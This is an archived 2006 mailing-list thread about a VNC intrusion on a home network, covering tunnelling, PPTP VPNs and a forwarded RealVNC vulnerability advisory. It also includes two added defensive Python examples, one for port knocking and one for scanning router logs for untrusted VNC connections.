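On the port-knocking suggestion: the router keeps the VNC port closed to everyone until a source sends SYNs to a secret sequence of closed ports, in order and within a short window, after which a firewall rule opens VNC for that source alone for a while. As an added example that is not part of the thread, the Python below is the sequence-tracking state machine such a daemon (doorman or any other) runs over inbound SYNs, handling the out-of-order and too-slow cases. The knock sequence, the window and the sample SYN log are constructed assumptions, and the firewall action is left as a comment because it depends on the firewall in use.

```python
from typing import Dict, Iterable, List, Optional, Sequence, Tuple

KNOCK_SEQUENCE = (7000, 8000, 9000)  # assumed secret sequence of closed ports
KNOCK_WINDOW = 10.0                  # seconds allowed from the first knock to the last


class KnockTracker:
    """Per-source state machine over inbound SYNs to closed ports."""

    def __init__(self, sequence: Sequence[int] = KNOCK_SEQUENCE, window: float = KNOCK_WINDOW):
        self.sequence = tuple(sequence)
        self.window = window
        # src -> (index of the next expected port, timestamp of the first knock)
        self._pending: Dict[str, Tuple[int, float]] = {}

    def observe(self, ts: float, src: str, dport: int) -> bool:
        """Feed one SYN (time-ordered per source). True when src just completed the sequence."""
        idx, first = self._pending.get(src, (0, ts))
        if idx > 0 and ts - first > self.window:
            idx, first = 0, ts               # partial sequence went stale: start over
        if dport == self.sequence[idx]:
            idx += 1
            if idx == len(self.sequence):
                self._pending.pop(src, None)  # done; the next knock starts a fresh attempt
                return True
            self._pending[src] = (idx, first)
        elif dport == self.sequence[0]:
            self._pending[src] = (1, ts)     # wrong port, but it is the first one: restart
        else:
            self._pending.pop(src, None)     # wrong port: discard all progress
        return False


def authorized_sources(events: Iterable[Tuple[float, str, int]],
                       tracker: Optional[KnockTracker] = None) -> List[str]:
    """Run a SYN log through the tracker; returns sources that completed the knock, in order."""
    tracker = tracker or KnockTracker()
    opened = []
    for ts, src, dport in events:
        if tracker.observe(ts, src, dport):
            opened.append(src)
            # A real daemon would now open VNC for this source only and close it again
            # later, e.g. on Linux: iptables -I INPUT -s <src> -p tcp --dport 5900 -j ACCEPT
    return opened


# Constructed SYN log as (timestamp, source, destination port); documentation addresses.
SAMPLE_SYNS = [
    (0.0, "203.0.113.5", 7000), (0.5, "198.51.100.9", 7000),
    (1.0, "203.0.113.5", 8000), (1.5, "198.51.100.9", 9000),  # second source knocks out of order
    (2.0, "203.0.113.5", 9000),                                # first source completes
    (3.0, "198.51.100.9", 8000),
    (10.0, "192.0.2.7", 7000), (25.0, "192.0.2.7", 8000),      # third source is too slow
    (26.0, "192.0.2.7", 9000),
]

if __name__ == "__main__":
    print("opened for:", authorized_sources(SAMPLE_SYNS))
```

The daemon only ever sees SYNs to ports that are closed anyway, so a scanner that walks ports in numeric order never reproduces the sequence, and the VNC port itself stays invisible to anyone who has not knocked. Use it as a gate in front of VNC, not as a substitute for tunnelling the VNC traffic.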
2006\10\10@220752
by
Orin Eman
On 10/10/06, Carey Fisher wrote:
> Orin Eman wrote:
> > On 10/9/06, Rich Mulvey wrote:
> >
> >> One thing to be aware of is that "VNC" is really just a reference to
> >> a protocol, and not a particular application. There are literally
> >> dozens of different implementations of VNC - some commercial, some open
> >> source, etc. Some have holes big enough to drive a truck through, while
> >> others are reasonably secure.
> >>
> >> That being said, there's no way in heck I'd ever use any VNC
> >> application that wasn't being tunneled over a VPN or SSH.
> >>
> >
> > That's safest...
> >
> > If you want a (rather old now) SSL enabled VNC, it's available from:
> >
> > www.laplink.com/products/vnc/overview.asp
> >
> > Orin.
> >
>
> I understand what you guys are saying and I do have a VPN equipped
> router at this location.
> But I need (want?) to access the machine in question from nearly
> anywhere and any machine
That's what Laplink Everywhere does... it's not free though. It uses
a Java VNC viewer to try to cover as many client operating systems as
possible - if you have access to a Java enabled browser, you can
access your VNC server.
I don't recall if the open source Java VNC viewer that's available
from the above link will make a direct connection to a VNC server or
not (if not, the change would be trivial), but it will do SSL as will
the server I originally mentioned.
Orin.
2006\10\10@221927
by
Gerhard Fiedler
Carey Fisher wrote:
> I understand what you guys are saying and I do have a VPN equipped router
> at this location. But I need (want?) to access the machine in question
> from nearly anywhere and any machine so I can't count on being able to
> setup a tunnel from just anywhere. Maybe I should just run VNC over a
> VPN connection between here and the one other place I spend a lot of
> time. I can install a VPN router there.
A PPTP connection is set up pretty quickly on any recent Windows PC, and
doesn't need a special router. (Most let it pass, for one connection at
least.)
Gerhard
2006\10\11@030943
by
Orin Eman
On 10/10/06, Gerhard Fiedler <listsEraseME .....connectionbrazil.com> wrote:
> Carey Fisher wrote:
>
> > I understand what you guys are saying and I do have a VPN equipped router
> > at this location. But I need (want?) to access the machine in question
> > from nearly anywhere and any machine so I can't count on being able to
> > setup a tunnel from just anywhere. Maybe I should just run VNC over a
> > VPN connection between here and the one other place I spend a lot of
> > time. I can install a VPN router there.
>
> A PPTP connection is set up pretty quickly on any recent Windows PC, and
> doesn't need a special router. (Most let it pass, for one connection at
> least.)
Whether it works or not is a different matter...
Sorry for the rant, but my copy of XP at home can't handle a bad
packet during the PPTP startup and just sits and sulks. A Win2k
virtual machine under Vmware on Gentoo Linux however works fine...
Orin.
2006\10\11@032935
by
Philip Pemberton
Orin Eman wrote:
> That's what Laplink Everywhere does... it's not free though. It uses
> a Java VNC viewer to try to cover as many client operating systems as
> possible - if you have access to a Java enabled browser, you can
> access your VNC server.
TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
5800.
--
Phil. | (\_/) This is Bunny. Copy and paste Bunny
EraseMEpiclist philpem.me.uk | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/ | (")_(") world domination.
2006\10\11@052328
by
Frank Niu
I got an announcement about this issue. It is indeed a VNC-related security
problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)
**********************************
There is a known exposure in some versions of the popular program VNC by
which an attacker can get past the password protection and compromise the
system. It was found in the "RealVNC" version and an upgrade which fixes
this exposure is available. Other versions of VNC may or may not be
affected.
Recently, a program which exploits this vulnerability has been spotted in
the wild. The corporate threat team is aware of this and has set the
corporate IPS systems to block this worm when spotted and to issue service
desk tickets against the source address (if internal). At this time,
there is no indication that a "CIO Patch Override" will be needed.
If you currently use RealVNC to remotely access your systems please check
that you have the latest build of your version of RealVNC. During the
recent Digital Threat and Risk Assessment it was discovered that older
builds of RealVNC have vulnerabilities that can be (and were) exploited to
gain unauthorized access to systems.
You will need to upgrade your version of RealVNC if you have a build date
earlier than MAY 2006. RealVNC upgrades are available at
http://www.realvnc.com/upgrade.html
*********************************
Carey Fisher - NCS wrote:
>
>
> Frank Niu wrote:
>> How is this matter going? Actually I encountered exactly the same
>> virus/worm
>> and don't know how to get rid of it.
>>
>>
> I've scanned with multiple virus scanners including AVG and Norton.
> I've run Adaware and Spybot and I've
> found nothing at all.
>
> Also, still no intrusions with any one or more of the following true:
> VNC stopped
> network disconnected
> logged out
>
>> Checked with sysinternal autorun.exe, found nothing suspicious. I'm
>> pretty
>> sure it has something to do with VNC: This issue occurs with my 3
>> machines
>> with VNC server installed every few minutes intermittently. After I
>> closed
>> VNC server, seems it won't occur for now.
>>
>> Any final solution for this?
>> pe a
>>
> I'm convinced there is no virus in the machine and it seems someone is
> trying to (manually?) type a command in the Start/Run box as if they are
> sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a Service which
> means if someone was using VNC they could still use it when all users
> are logged out except they can't login cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from the
> router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey
> --
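Carey's observation above, that only the machine the router forwards VNC to is being reached, and the announcement's note that the corporate IPS blocks and tickets source addresses, both point at the same home-scale control: review the router's connection log for inbound VNC sessions that came from addresses you do not recognise. The following is an added illustration for this thread, not code from any of the posters, from Wallwatcher or from any router vendor; the log line format, the addresses and the trusted-source list are constructed assumptions, and only the port numbers (5900 for RFB, 5800 for the Java/HTTP viewer) come from the discussion.

```python
"""Flag inbound VNC connections from unexpected sources in a router log.

Added illustration for the thread above; it is not code from the PICList
posters, from Wallwatcher or from any router vendor. The log line format,
the addresses and the trusted-source list are constructed assumptions;
only the VNC port numbers (5900 for RFB, 5800 for the Java/HTTP viewer)
come from the discussion.
"""
import re
from collections import Counter

VNC_PORTS = {5800, 5900}

# Constructed allow-list: the only remote addresses expected to reach VNC.
TRUSTED_SOURCES = {"198.51.100.4"}

# Constructed log format:
# "<date> <time> IN TCP <src>:<sport> -> <dst>:<dport> <ACTION>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) IN TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<action>ALLOW|DROP)$"
)

# Constructed sample: a forwarded VNC port on 192.168.0.10, one trusted user
# and one unknown source that keeps coming back.
SAMPLE_LOG = """\
2006-10-09 14:20:58 IN TCP 203.0.113.9:41022 -> 192.168.0.10:5900 ALLOW
2006-10-09 14:21:03 IN TCP 198.51.100.4:50211 -> 192.168.0.10:5900 ALLOW
2006-10-09 14:25:41 IN TCP 203.0.113.9:41030 -> 192.168.0.10:5900 ALLOW
2006-10-09 14:25:42 IN TCP 203.0.113.9:41031 -> 192.168.0.10:5800 ALLOW
2006-10-09 14:26:10 IN TCP 203.0.113.9:41040 -> 192.168.0.10:445 DROP
2006-10-09 14:30:00 IN TCP 192.0.2.77:6001 -> 192.168.0.10:5900 DROP
this line is not in the expected format and is skipped
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def vnc_alerts(log_text, trusted=TRUSTED_SOURCES):
    """Return (alerts, per_source_counts) for inbound VNC sessions the router
    let through from sources that are not on the trusted list.

    DROPped attempts are ignored: the firewall already handled them and they
    would only add noise here. Each alert is (timestamp, source, destination
    host, destination port).
    """
    alerts = []
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["action"] != "ALLOW" or rec["dport"] not in VNC_PORTS:
            continue
        if rec["src"] in trusted:
            continue
        alerts.append((rec["ts"], rec["src"], rec["dst"], rec["dport"]))
        counts[rec["src"]] += 1
    return alerts, counts


if __name__ == "__main__":
    alerts, counts = vnc_alerts(SAMPLE_LOG)
    for ts, src, dst, dport in alerts:
        print(f"{ts}  {src} -> {dst}:{dport}  untrusted source reached VNC")
    for src, n in counts.most_common():
        print(f"{src}: {n} accepted VNC connection(s)")
```

Run against the real router export, the timestamps of accepted untrusted sessions can be lined up with the moments the Run box was driven, which is the quickest way to confirm or rule out the forwarded VNC port as the way in.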
2006\10\11@064506
by
Bob Axtell
Frank Niu wrote:
> I got an announcement about this issue. It is indeed a VNC-related security
> problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)
>
> **********************************
> There is a known exposure in some versions of the popular program VNC by
> which an attacker can get past the password protection and compromise the
> system. It was found in the "RealVNC" version and an upgrade which fixes
> this exposure is available. Other versions of VNC may or may not be
> affected.
>
That's a very important catch, Frank. Thanks!
--Bob
> Recently, a program which exploits this vulnerability has been spotted in
> the wild. The corporate threat team is aware of this and has set the
> corporate IPS systems to block this worm when spotted and to issue service
> desk tickets against the source address (if internal). At this time,
> there is no indication that a "CIO Patch Override" will be needed.
>
>
> If you currently use RealVNC to remotely access your systems please check
> that you have the latest build of your version of RealVNC. During the
> recent Digital Threat and Risk Assessment it was discovered that older
> builds of RealVNC have vulnerabilities that can be (and were) exploited to
> gain unauthorized access to systems.
>
> You will need to upgrade your version of RealVNC if you have a build date
> earlier than MAY 2006. RealVNC upgrades are available at
> http://www.realvnc.com/upgrade.html
>
> *********************************
>
>
> Carey Fisher - NCS wrote:
>
>> Frank Niu wrote:
>>
>>> How is this matter going? Actually I encountered exactly the same
>>> virus/worm
>>> and don't know how to get rid of it.
>>>
>>>
>>>
>> I've scanned with multiple virus scanners including AVG and Norton.
>> I've run Adaware and Spybot and I've
>> found nothing at all.
>>
>> Also, still no intrusions with any one or more of the following true:
>> VNC stopped
>> network disconnected
>> logged out
>>
>>
>>> Checked with sysinternal autorun.exe, found nothing suspicious. I'm
>>> pretty
>>> sure it has something to do with VNC: This issue occurs with my 3
>>> machines
>>> with VNC server installed every few minutes intermittently. After I
>>> closed
>>> VNC server, seems it won't occur for now.
>>>
>>> Any final solution for this?
>>> pe a
>>>
>>>
>> I'm convinced there is no virus in the machine and it seems someone is
>> trying to (manually?) type a command in the Start/Run box as if they are
>> sitting in front of the computer.
>>
>> So, that sorta leaves VNC except I have it running as a Service which
>> means if someone was using VNC they could still use it when all users
>> are logged out except they can't login cause I have a strong password.
>> I have 3 machines with VNC but only one is forwarded to from the
>> router. That's the one that's being compromised.
>>
>> Now I'm investigating my Wi-Fi nodes.
>>
>> Carey
>> --
2006\10\11@093308
by
Gerhard Fiedler
Orin Eman wrote:
>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>> doesn't need a special router. (Most let it pass, for one connection at
>> least.)
>
> Whether it works or not is a different matter...
>
> Sorry for the rant, but my copy of XP at home can't handle a bad
> packet during the PPTP startup and just sits and sulks. A Win2k
> virtual machine under Vmware on Gentoo Linux however works fine...
Well, yes, YMMV :)
FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
built-in VPN server) from my WinXP Pro notebook, and I never had a problem.
Gerhard
2006\10\11@144340
by
Richard Prosser
As does UltraVNC.
RP
On 11/10/06, Philip Pemberton <RemoveMEpiclistEraseME EraseMEphilpem.me.uk> wrote:
> Orin Eman wrote:
> > That's what Laplink Everywhere does... it's not free though. It uses
> > a Java VNC viewer to try to cover as many client operating systems as
> > possible - if you have access to a Java enabled browser, you can
> > access your VNC server.
>
> TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
> 5800.
>
> --
> Phil. | (\_/) This is Bunny. Copy and paste Bunny
> RemoveMEpiclistspam_OUT KILLspamphilpem.me.uk | (='.'=) into your signature to help him gain
> http://www.philpem.me.uk/ | (")_(") world domination.
> -
2006\10\11@202439
by
Carey Fisher
Bob Axtell wrote:
> Frank Niu wrote:
>
>> I got an announcement about this issue. It is indeed a VNC-related security
>> problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)
>>
>> **********************************
>> There is a known exposure in some versions of the popular program VNC by
>> which an attacker can get past the password protection and compromise the
>> system. It was found in the "RealVNC" version and an upgrade which fixes
>> this exposure is available. Other versions of VNC may or may not be
>> affected.
>>
>>
> That's a very important catch, Frank. Thanks!
>
> --Bob
>
>
Yes, thanks Frank!
Carey
2006\10\11@202607
by
Carey Fisher
Gerhard Fiedler wrote:
> Orin Eman wrote:
>
>
>>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>>> doesn't need a special router. (Most let it pass, for one connection at
>>> least.)
>>>
>> Whether it works or not is a different matter...
>>
>> Sorry for the rant, but my copy of XP at home can't handle a bad
>> packet during the PPTP startup and just sits and sulks. A Win2k
>> virtual machine under Vmware on Gentoo Linux however works fine...
>>
>
> Well, yes, YMMV :)
>
> FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
> built-in VPN server) from my WinXP Pro notebook, and I never had a problem.
>
> Gerhard
>
Gerhard,
I like your approach and am going to try it - VPN server-in-router at
main location, setup PPTP at the other end.
Thanks,
Carey
2006\10\12@091335
by
Gerhard Fiedler
Carey Fisher wrote:
> I like your approach and am going to try it - VPN server-in-router at
> main location, setup PPTP at the other end.
FWIW, my router supports also IPsec. However, I find PPTP has generally
worked well for me and it is very quick and easy to set up on Win2k+
systems without any additional software.
Gerhard